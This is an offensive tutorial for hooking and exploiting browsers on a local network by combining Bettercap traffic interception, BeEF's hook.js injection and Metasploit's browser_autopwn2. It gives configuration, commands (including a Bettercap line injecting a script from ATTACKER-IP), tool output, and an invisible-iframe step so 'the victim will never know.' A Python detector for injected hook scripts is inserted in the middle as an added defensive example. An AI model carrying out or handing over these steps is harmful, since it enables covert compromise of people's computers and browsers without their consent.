This tutorial assumes that you already know your way around the basics of Metasploit, Bettercap and BeEF.
Versions used:
– Bettercap v1.5.8
– Metasploit msfconsole 4.12.41-dev
– BeEF 0.4.7.0-alpha
Objective:
The objective is to create a hook.js address in BeEF and inject it into any machine inside your LAN without the victim knowing or having to interact with it. Also, if by any chance their browser is exploitable, you can get a shell by using it in conjunction with Metasploit’s browser_autopwn2. If you need the newest BeEF version you can clone its git repository from master into a new folder and install it there; it won’t interfere with your previous version.
Tests concluded:
– Attacker’s machine: Kali 2
– Tested successfully on victim machines:
  OS: Windows XP SP2, XP SP3, 2012 Server, Win7, Win8, Win8.1, Win10 and OSX
  Browser: different versions of Safari, Firefox, Chrome and IE
BeEF prep:
First you have to enable the Metasploit extension. In the BeEF folder go to extensions/metasploit/config.yaml and set:
enable: true
host: ATTACKER-IP
callback_host: ATTACKER-IP
Then close it and create a file in any folder you will be working from. Personally I have a folder created in the same BeEF location to load my stuff. The file can be called anything you want; I’ll call it beef_to_msf_load. Inside it you will have to provide the same parameters you set in extensions/metasploit/config.yaml before. So mine contains the following (the msgrpc plugin takes its options as key=value pairs):
load msgrpc ServerHost=ATTACKER-IP User=msf Pass=abc123 SSL=y
It goes without saying, but wherever it says ATTACKER-IP it has to be substituted with your Kali/Backbox/attacker-OS IP address.
Steps:
$ msfconsole -r beef_to_msf_load
You should get something similar to this:
[*] Processing loadmsfparams for ERB directives.
resource (loadmsfparams)> load msgrpc ServerHost=ATTACKER-IP User=msf Pass=abc123 SSL=y
[*] MSGRPC Service: ATTACKER-IP:55552 (SSL)
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
Load browser_autopwn2:
msf> use auxiliary/server/browser_autopwn2
Open another terminal and start BeEF:
$ ruby beef
or
$ ./beef
Just load BeEF normally. You can clear the previous cache, if it is interfering, by appending -x so it does a clean load. You should get something similar to this:
[*] Project Creator: Wade Alcorn (@WadeAlcorn)
[*] Connecting to Metasploit on ATTACKER-IP:55552
[*] Successful connection with Metasploit.
[*] Loaded 295 Metasploit exploits.
[*] Resetting the database for BeEF.
[*] BeEF is loading. Wait a few seconds...
[*] 13 extensions enabled.
[*] 572 modules enabled.
Open another terminal for Bettercap:
$ bettercap -T TARGET-IP --proxy-module injectjs --js-url "http://ATTACKER-IP:3000/hook.js"
This will sniff the target’s traffic and start injecting our hook.js into their browser without the victim noticing. So you don’t need any social engineering to get them to open that link; you’ll be forcing the victim’s browser to silently load your hook.js URL. It works wonderfully: you’ll see the browser appear in your BeEF panel sooner or later.
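From the defender’s side, the injection step above leaves a visible trace: an extra script tag in an HTTP response that points at a hook script on a host other than the one that served the page. The following detection check is an added example and not part of the original tutorial or of any of the tools it describes; the two HTML responses, the host name intranet.example and the address 192.0.2.10 are constructed sample data, and the list of hook file names is an assumption you would extend with whatever your own environment considers suspicious.

```python
"""Flag <script src=...> tags in an HTTP response body that load a hook-style
script from a host other than the one that served the page.

Added example for inspecting captured HTTP responses (for instance from a
proxy log or a packet capture); the samples below are constructed."""
import re
from typing import Iterable, List
from urllib.parse import urlparse

# Matches a script tag and captures the value of its src attribute.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE
)

# File names commonly used by browser-hooking frameworks (assumption; extend as needed).
DEFAULT_HOOK_NAMES = ("hook.js",)


def find_suspicious_scripts(
    page_host: str, body: str, hook_names: Iterable[str] = DEFAULT_HOOK_NAMES
) -> List[str]:
    """Return script URLs in `body` that are absolute, point off-host and end in a
    hook-style file name. `page_host` is the Host header of the request that
    produced this response (the caller is assumed to know it)."""
    wanted = {name.lower() for name in hook_names}
    hits: List[str] = []
    for src in SCRIPT_SRC_RE.findall(body):
        parsed = urlparse(src)
        # Relative URLs (no netloc) stay on the serving host and are not of interest here.
        if not parsed.netloc:
            continue
        host = (parsed.hostname or "").lower()
        filename = parsed.path.rsplit("/", 1)[-1].lower()
        if host != page_host.lower() and filename in wanted:
            hits.append(src)
    return hits


# Constructed sample responses: one untouched page and one with an injected tag.
SAMPLE_CLEAN = (
    '<html><head><script src="/static/app.js"></script></head>'
    "<body>intranet portal</body></html>"
)
SAMPLE_INJECTED = (
    '<html><head><script type="text/javascript" '
    'src="http://192.0.2.10:3000/hook.js"></script>'
    '<script src="/static/app.js"></script></head>'
    "<body>intranet portal</body></html>"
)


def scan_samples() -> dict:
    """Run the check over the constructed samples, keyed by sample name."""
    return {
        "clean": find_suspicious_scripts("intranet.example", SAMPLE_CLEAN),
        "injected": find_suspicious_scripts("intranet.example", SAMPLE_INJECTED),
    }


if __name__ == "__main__":
    for name, urls in scan_samples().items():
        print(f"{name}: {urls or 'no off-host hook scripts'}")
```

The check is deliberately narrow: it only looks at absolute script URLs whose file name matches a known hook name, so a proxy that renames the script or serves it from a path on the victim’s own host would slip past it. In practice you would pair it with the more general signals the technique relies on, such as a gateway MAC address that suddenly changes (the ARP poisoning Bettercap performs) and plain-HTTP pages that gain a script tag the origin server never sent.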
Optional – Metasploit:
You can load the newest version of browser_autopwn, simply called browser_autopwn2, as we did above:
msf> use auxiliary/server/browser_autopwn2
Set the appropriate fields, which is pretty straightforward, and launch it as a background job. You will be launching a good bunch of exploits, sorted by Metasploit by effectiveness.
msf> run -z
This will give you another URL that the user has to browse to in order to trigger the exploits. Do we need to disconnect Bettercap and reconnect using techniques such as DNS spoofing? Not at all! We already have BeEF to do that for us. So go to your target in the BeEF panel and open
Commands > Misc > Create invisible Iframe
This is pure magic: use it to force the already hooked browser to load the new URL your Metasploit bulk of exploits just created, and you will see it triggered. The victim will never know. What can happen, though, is that the target’s browser shows a confirmation prompt to the user, depending on the exploit used (JS, Adobe, etc.), the browser and its version, the OS, etc.